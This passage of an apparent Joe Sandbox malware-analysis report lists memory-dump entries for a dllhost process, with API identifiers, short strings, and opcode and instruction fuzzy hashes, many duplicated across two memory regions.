                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 29b799a12d1e495360678f6c99d97651764ead528e68b1281528f3514f84822d
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 6B010536A10BD09AEB14DF66E90418D77A2F788F90B49C029EF4D53729EE34D452C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                  • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                                                  • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                  • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001EF092328DF), ref: 000001EF09232A12
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 9c46a2c19d53eff69ec6a622630ec78b3a95a7681e75a5f494be9110ebfae0be
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: C291B0326106D4C9FB608F65D6507ED3BA2F394B88F5C816EEE5A57A86EB34C487C300
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001EF094328DF), ref: 000001EF09432A12
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 95937cfcfb8edb4178ad1d4e88be4bfff70162bf538a61895ba2b850369b4910
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: EA91E33A7106D085FB609F75D5503ED3BA2B794BA8F4CC12EEE5A53686EA74C047C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 5e7775a56cdc097f371ba2d6cc6758a2bd9f0d92324f9013647d0e0f4e226935
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 07112736711F448AEB00CF60E8543AC33A4F799758F481E39EE6D867A5EB78C1958340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 4168f6a4c05c25c8db0f6138d46df6acc356e05af9a767263abae54d9fde3fb6
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: CD111F3A710F8489EB00CB60E8553AC33A4F759768F488E39EE5D467A5EB78C1558340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 23c72c1b0932c7e07b4eb729c1317666a2be565756b75dd4da41afdf8b92b173
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 1B719F32214BC1A1EA38DF26D9443EE6796F3C5B84F58003AFD5957B8AEE36C602C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 1cdc6b2adbaa6cd7323a3d8c14b8d44c548a8b2a60e81954b4876c5a575234cf
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: AA71843A214BC142E6789F66D9543EE6796F3C4BA4F88C13AFD1943B56FA76C602C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 58d9cfa9fd0ddf14d75cb983739d6678b2a770d95b2566fe483b48dd423ed6b2
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 25519132315A888ADB54DB19D464BAC3392E784B98F598279BE474778AF778D842C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 45b148d2c609bbb63c5f7e0a24d777843d6c58503c3874027890c79a40df8fe8
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 96617D32608BC881D7719F15E4507DEB7A1F7C5B98F184229EF9907B96EB78C191CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 591986cb316decfd99ed2824da0224bea9ae8463413b6547c740923684bbc05c
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 4451B1362087C1A1EA289E25E5543EE6792F3D5B80F5C403DED6943B9BFA3AC546CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 0ae70c098a1da78b72ac33f5c3cec00621859edcc6e268ae7c6a814d66a37c82
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 0E51D53A2087C141EA689E25E4543EE6652F7D4BA0F88C03DED6953B5BFABAC506C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 141714e3b0a11fd9c2b6280b145be3cceaf8cddddff2e656059df19d83014db4
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: A541C132625AC0C6E7108F25E4047DEA7A2F388784F88813AFE4D87759FB38C442CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: edfc15c575706c56641c6c838389d7b332567c5652a90a1df61a2d0f09e42bbe
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 1441BF36625AC086E7108F65E4047DEB7A2F7887A4F88C129FE4D87799EB78C442CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 540135ee005ba917dd06961022b9d0b4f5ffc2bdc7c95802cedbe49be851cd26
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 0A111936214B8082EB218F15E54429DB7E6F788B94F588228EE8D07B65EF78C592CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: ce39ab34ac9c1788c70514cefc975d5f63b339473fbe2a0c137f1cd462f95933
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: DF111C36214BC082EB218B25E54429D77E6F788BA4F5CC228EE8D07755EF39C552CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: ntdll.dll
                                                  • API String ID: 1646373207-2227199552
                                                  • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                  • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                  • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                  • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 3a53f73d0336cdcec70c569ed367c9fec2be90cfc8e6ceb2b0d951ce42f530b4
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: 2A118B35A05B8091EA14DF66E80469D67A2F7C8FC0F5C803CEE8E53726EF38D4528300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: ae582b7fbfb18ca9f97503f5674d53d5567f65561dc9b84434775681c0a6666d
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: B9117939A15BC081EA14CB66E80429D67A2F7C8FE0F9CC028EE4E53726EE39D4428300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: c3d820a82653094e69c49a9f0ed0bb4972f190c7295b98ec9ffd05dd74ab9977
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 63E06D316016449AE7148F62D80878D37E2FBC8F05F48C02CDD8D07351EF7D849A8740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: a1f9912fca5d3fd98f07ce8d9caceea79556a9c45493ba9af824559331dc6bab
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 06E06D35A016849AEB148F62D80838D36E2FBC8F25F48C02CDD0D07351EF7D849A8740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
